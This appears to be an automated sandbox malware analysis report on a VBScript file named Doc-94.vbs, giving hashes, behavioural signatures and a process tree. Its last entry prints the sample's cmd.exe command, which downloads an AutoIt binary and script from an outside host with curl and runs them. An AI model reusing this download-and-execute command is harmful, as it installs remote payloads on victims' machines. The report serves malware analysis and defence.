Analysis
- max time kernel: 118s
- max time network: 121s
- platform: windows7_x64
- resource: win7-20230831-en
- resource tags: arch:x64 arch:x86 image:win7-20230831-en locale:en-us os:windows7-x64 system
- submitted: 13-10-2023 13:11
Static task: static1
Behavioral task: behavioral1
- Sample: Doc-94.vbs
- Resource: win7-20230831-en, windows7-x64
- 2 signatures
- 150 seconds
Behavioral task: behavioral2
- Sample: Doc-94.vbs
- Resource: win10v2004-20230915-en, windows10-2004-x64
- 5 signatures
- 150 seconds
General
- Target: Doc-94.vbs
- Size: 25KB
- MD5: d050315ff65ebef0ba1352167126592f
- SHA1: e2009bb0ccae9b82d57c45d7b6c39d76faded05d
- SHA256: 1e8a6d34c0fe5a5ad2fc1d6ff7000bcf8efa0704c397cb6ef021c2692bf17fe6
- SHA512: e5e50b1ab9e4d939d401225daaa98cdcd5696813aae91538f911202982b2937229faa358f5a8ba4094c2c5121e0e236ad00f857a36b91891f10061dbc08c1b46
- SSDEEP: 768:3IvITQgdN5RyiUiK3IfJO37NwNGFFNWePDUirUif3IhBN67e:3IvI8/e
Score
3/10
Malware Config
Signatures
- Enumerates physical storage devices (1 TTPs)
  Attempts to interact with connected storage/optical drive(s).
- Suspicious use of WriteProcessMemory (3 IoCs)
  Processes: WScript.exe
  description | pid | process | target process
  PID 1876 wrote to memory of 2432 | 1876 | WScript.exe | cmd.exe
  PID 1876 wrote to memory of 2432 | 1876 | WScript.exe | cmd.exe
  PID 1876 wrote to memory of 2432 | 1876 | WScript.exe | cmd.exe
Processes
- C:\Windows\System32\WScript.exe
  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Doc-94.vbs"
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" f InStr(1, WScript.ScriptFullName,"vbs", 1) > 0 Then:path = WScript.ScriptFullName:end if '/c cd /d %temp% & curl -o Autoit3.exe http://whoernet.co.com:80 & curl -o dftxsm.au3 http://whoernet.co.com:80/msifvwjscyk & Autoit3.exe dftxsm.au3